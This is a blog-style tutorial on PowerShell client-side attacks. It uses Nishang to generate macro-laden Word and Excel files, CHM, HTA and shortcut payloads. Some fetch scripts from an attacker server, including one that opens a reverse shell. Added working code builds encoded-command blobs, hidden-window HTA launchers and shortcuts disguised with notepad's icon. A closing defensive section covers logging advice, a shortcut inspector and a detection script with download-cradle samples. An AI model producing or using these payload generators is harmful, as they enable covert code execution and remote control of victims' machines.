Client-side attacks are among the most common techniques attackers use. A client-side attack happens when the user downloads or executes malicious content on their own operating system. The attacker can build the payload around Microsoft Word, Excel, media players, browsers and similar everyday applications.
To perform this attack we craft a payload that relies on native functions of the operating system. This is where PowerShell comes in: the operating system ships with native features that a crafted payload can use against the target, and PowerShell gives us direct access to them.
This blog post covers client-side attacks with PowerShell and the tools and techniques used to perform them.
What is PowerShell?
PowerShell is a cross-platform task automation and configuration management framework, comprising a command-line shell and scripting language.
Why PowerShell?
PowerShell is already present on every modern Windows operating system. It can easily reach Windows internals such as .NET classes, WMI, the Windows API, WinRM and the registry, which also makes it a powerful post-exploitation tool on the victim system.
Using PowerShell for Client-side Attacks
In this attack we use PowerShell scripts from Nishang and PowerSploit; the Out-* and Invoke-Encode scripts used below are part of Nishang.
Out-Word.ps1
This script generates a weaponised Word document. When the document is opened, its macro auto-executes and runs the PowerShell payload on the victim machine. The payload runs silently, without any visible effect on the Word document.
Command to generate the file:
Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
Note: If macros are blocked in Word, the user is shown a warning and must allow the macro before it runs; if macros are enabled, there is no warning at all.
Out-Excel.ps1
MS Excel works like MS Word, with the same features and payloads, and it is often preferred over Word.
Out-Excel -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
We can also get a reverse shell with the payload below, where "IP" is the attacker-owned server that receives the reverse connection. With -PayloadURL the document downloads the script at that URL and executes it, so the hosted script is what opens the reverse shell.
Out-Excel -PayloadURL http://ip/metospolit.ps1
Out-CHM.ps1
In this method we create a compiled HTML help file (.chm) that executes PowerShell. First, write the malicious PowerShell script. Then use Invoke-Encode to encode it:
Invoke-Encode -DataToEncode .\excel.ps1 -OutCommand
Take the encoded command that the -OutCommand switch writes out.
Then use Out-CHM to build the CHM file (it needs the HTML Help Workshop compiler, hence -HHCPath):
Out-CHM -Payload "-e <encoded command>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
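The encode step above is easy to treat as magic, so here is an added example (hand-rolled, not Nishang's Invoke-Encode) that produces the same kind of artefact Out-CHM consumes: the script is gzipped and base64-encoded, wrapped in a one-line decode stub, and that stub is then encoded the way powershell.exe -EncodedCommand (-e) expects, as base64 of UTF-16LE text. The file name excel.ps1 is the one used in the post; its contents here are a constructed sample, and the decode function shows the reverse step an analyst performs on a captured -e argument.

```powershell
# Added example, not Nishang's code: build an -EncodedCommand blob the way
# Invoke-Encode -OutCommand does in shape (gzip + base64 + IEX stub + UTF-16LE base64).

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string] $ScriptPath)

    $script = Get-Content -Path $ScriptPath -Raw

    # 1. gzip the script and base64 the compressed bytes (keeps long scripts short)
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $sw = New-Object System.IO.StreamWriter($gz)
    $sw.Write($script)
    $sw.Close()                                   # flushes and closes gz and ms; ToArray still works
    $blob = [Convert]::ToBase64String($ms.ToArray())

    # 2. one-liner that reverses step 1 in memory and hands the script to Invoke-Expression
    $stub = "IEX (New-Object IO.StreamReader((New-Object IO.Compression.GZipStream(" +
            "[IO.MemoryStream][Convert]::FromBase64String('$blob')," +
            "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::UTF8)).ReadToEnd()"

    # 3. -EncodedCommand takes base64 of the UTF-16LE bytes of the command, not UTF-8
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stub))
}

# Reverse of step 3: what an analyst does with a captured "-e <blob>" argument
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string] $Encoded)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

# Constructed sample script (assumption); in the post this is the malicious excel.ps1
Set-Content -Path .\excel.ps1 -Value 'Get-Process | Select-Object -First 5 Name, Id'

$enc = ConvertTo-EncodedCommand -ScriptPath .\excel.ps1

# The Out-CHM invocation this blob would go into
"Out-CHM -Payload `"-e $enc`" -HHCPath 'C:\Program Files (x86)\HTML Help Workshop'"

# Round trip: decoding gives back the IEX stub, and running the blob must behave like excel.ps1
ConvertFrom-EncodedCommand -Encoded $enc
powershell.exe -NoProfile -EncodedCommand $enc
```

Two details matter for both sides. The UTF-16LE encoding in step 3 is why an -e blob copied out of a log decodes to garbage with a plain base64 decoder, and why the ConvertFrom function uses [Text.Encoding]::Unicode. And because steps 1 and 2 use .NET types directly, the stub fails under PowerShell Constrained Language Mode, which is one reason that control is worth enabling on workstations.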
Out-HTA.ps1
Out-HTA creates a malicious HTML Application (.hta) containing VBScript, which is deployed on a web server. When the victim opens the HTA, mshta.exe runs the VBScript, which in turn executes the chosen PowerShell payload.
Use the command below to generate the file:
Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
To have the HTA download a script from the web server and run it, pass -PayloadURL (here Nishang's Powerpreter module) and the function to call with -Arguments:
Out-HTA -PayloadURL http://127.0.0.1/powerpreter.psm1 -Arguments Check-VM
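To make the mechanism concrete, here is an added example (not Nishang's Out-HTA) of a PowerShell function that writes such an HTML Application: the VBScript starts a hidden powershell.exe through WScript.Shell and then closes the HTA window. The output file name, the window title and the payload in the usage line are assumptions; the payload is the post's example without -noexit, since a hidden console that never exits would just leave a stray process behind.

```powershell
# Added example, not Nishang's code: generate an .hta whose VBScript launches
# powershell.exe hidden, the execution chain mshta.exe -> VBScript -> powershell.exe
# described above.

function New-HtaLauncher {
    param(
        [Parameter(Mandatory)][string] $PowerShellArguments,   # everything after powershell.exe
        [Parameter(Mandatory)][string] $OutputPath
    )
    # VBScript string literals escape a double quote by doubling it
    $vbsArgs = $PowerShellArguments -replace '"', '""'

    $hta = @"
<html>
<head>
<title>Update</title>
<HTA:APPLICATION ID="app" APPLICATIONNAME="Update" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />
<script language="VBScript">
Sub RunPayload()
    Dim sh
    Set sh = CreateObject("WScript.Shell")
    ' 0 = hidden window, False = do not wait for powershell.exe to exit
    sh.Run "powershell.exe $vbsArgs", 0, False
    window.close
End Sub
</script>
</head>
<body onload="RunPayload()"></body>
</html>
"@
    Set-Content -Path $OutputPath -Value $hta -Encoding ASCII
    Get-Item -Path $OutputPath
}

# Usage (constructed): the post's Out-HTA payload, minus -noexit
New-HtaLauncher -OutputPath .\update.hta `
    -PowerShellArguments '-ExecutionPolicy Bypass -noprofile -WindowStyle Hidden -c Get-ChildItem'
```

Double-clicking the file (or opening it from a browser download) hands it to mshta.exe, so from the defender's side the telltale signal is mshta.exe spawning powershell.exe, a parent/child pair that has no legitimate reason to appear on most workstations.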
Out-Shortcut.ps1
Out-Shortcut creates a shortcut (.lnk) that executes the PowerShell payload. When the victim clicks the shortcut, the predefined payload runs.
Use the command below to generate the file:
Out-Shortcut -Payload "-windowstyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
We can also set a hotkey that triggers the payload and an icon for the shortcut, and again have it fetch Powerpreter from the attacker's server:
Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'
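As an added example (not Nishang's Out-Shortcut) the block below builds the same kind of .lnk with the WScript.Shell COM object, which is the API Out-Shortcut-style tools and Explorer itself use, and includes a second function that reads any .lnk back, the first thing to do when triaging a suspicious shortcut. The output path, hotkey, icon and sample arguments are assumptions.

```powershell
# Added example, not Nishang's code: create a shortcut whose target is powershell.exe
# with a hidden payload, then read its real target back for triage.

function New-PayloadShortcut {
    param(
        [Parameter(Mandatory)][string] $Arguments,        # arguments for powershell.exe
        [Parameter(Mandatory)][string] $OutputPath,       # must end in .lnk
        [string] $HotKey = 'F3',
        [string] $IconPath = "$env:SystemRoot\System32\notepad.exe"
    )
    # COM resolves relative paths against the process directory, so hand it an absolute path
    $full = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutputPath)

    $wsh = New-Object -ComObject WScript.Shell
    $lnk = $wsh.CreateShortcut($full)
    $lnk.TargetPath   = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
    $lnk.Arguments    = $Arguments
    $lnk.WindowStyle  = 7                   # 7 = start minimised (1 normal, 3 maximised)
    $lnk.Hotkey       = $HotKey             # only fires while the .lnk sits on the Desktop or in the Start Menu
    $lnk.IconLocation = "$IconPath,0"       # borrow notepad's icon so the target is not obvious
    $lnk.Description  = 'Notepad'           # shown as the tooltip
    $lnk.Save()
    Get-Item -Path $full
}

function Get-ShortcutTarget {
    # CreateShortcut on an existing .lnk loads it instead of creating a new one
    param([Parameter(Mandatory)][string] $Path)
    $lnk = (New-Object -ComObject WScript.Shell).CreateShortcut((Resolve-Path -Path $Path).Path)
    [pscustomobject]@{
        Target      = $lnk.TargetPath
        Arguments   = $lnk.Arguments
        WindowStyle = $lnk.WindowStyle
        Hotkey      = $lnk.Hotkey
        Icon        = $lnk.IconLocation
    }
}

# Usage (constructed): the post's Out-Shortcut payload, written to the user's Desktop
$shortcut = New-PayloadShortcut -OutputPath "$env:USERPROFILE\Desktop\Notes.lnk" `
    -Arguments '-windowstyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem'
Get-ShortcutTarget -Path $shortcut.FullName
```

The icon and description are what the victim sees; TargetPath and Arguments are what actually runs, which is why Get-ShortcutTarget (or simply right-click, Properties) is the check to make on any shortcut that arrived by e-mail or download.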
We have seen in this post the different ways to perform client-side attacks with PowerShell. To defend against them, disable macros (or allow only signed ones) through Group Policy, and restrict PowerShell rather than trying to remove it: Constrained Language Mode together with an AppLocker or WDAC policy breaks most of the payloads above. Also enable PowerShell Script Block Logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) and Module Logging, and forward those events to your security monitoring solution so that malicious execution, in particular encoded commands and download cradles, is caught.
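The logging advice is only useful if something looks at the events, so here is an added example (not part of the original post) of the detection side: a function that scans PowerShell script block text for the patterns the payloads above leave behind and decodes any -EncodedCommand blob so the analyst sees the real command. It assumes Script Block Logging is enabled (event 4104); the sample lines are constructed, and the commented Get-WinEvent pipeline shows how to feed it live events.

```powershell
# Added example, not from the original post: flag script blocks that carry the
# client-side payload patterns discussed above (encoded commands, download cradles,
# execution-policy bypass, hidden windows, the gzip/base64 decode stub).

$Indicators = [ordered]@{
    EncodedCommand = '(^|\s)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'   # -e / -enc / -EncodedCommand <base64>
    InMemoryExec   = '\bIEX\b|Invoke-Expression'
    DownloadCradle = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient'  # what -PayloadURL produces
    PolicyBypass   = 'ExecutionPolicy\s+Bypass'
    HiddenWindow   = 'WindowStyle\s+Hidden'
    DecodeStub     = 'GZipStream|FromBase64String'                          # Invoke-Encode style stub
}

function Get-SuspiciousScriptBlock {
    param([Parameter(Mandatory, ValueFromPipeline)][string] $ScriptBlockText)
    process {
        $hits = foreach ($name in $Indicators.Keys) {
            if ($ScriptBlockText -match $Indicators[$name]) { $name }
        }
        if (-not $hits) { return }

        # Recover the command hidden behind -e: it is base64 of UTF-16LE text, not UTF-8
        $decoded = $null
        if ($ScriptBlockText -match '-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})') {
            try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
            catch { $decoded = '<not valid base64>' }
        }
        [pscustomobject]@{
            Indicators = $hits -join ','
            Decoded    = $decoded
            Text       = $ScriptBlockText
        }
    }
}

# Constructed sample script blocks, shaped like the ScriptBlockText of 4104 events for
# the payloads above; the last line is benign and must not be reported
$SampleScriptBlocks = @(
    'powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process',
    'IEX (New-Object Net.WebClient).DownloadString(''http://192.168.254.1/powerpreter.psm1''); Check-VM',
    'powershell.exe -NoProfile -e RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==',   # base64(UTF-16LE "Get-Process")
    'Get-ChildItem C:\Users | Measure-Object'
)
$SampleScriptBlocks | Get-SuspiciousScriptBlock | Format-List

# Against live data: ScriptBlockText is the third property of a 4104 event
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Get-SuspiciousScriptBlock
```

Run on the samples, the first three lines are reported (PolicyBypass; InMemoryExec and DownloadCradle; EncodedCommand with Decoded = Get-Process) and the fourth is not. The regex patterns are deliberately loose, so treat the output as triage input rather than an alert on its own, and pair it with process-creation telemetry that shows winword.exe, excel.exe, mshta.exe or hh.exe as the parent of powershell.exe.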
Hope you had a good time reading this. Please post your comments below.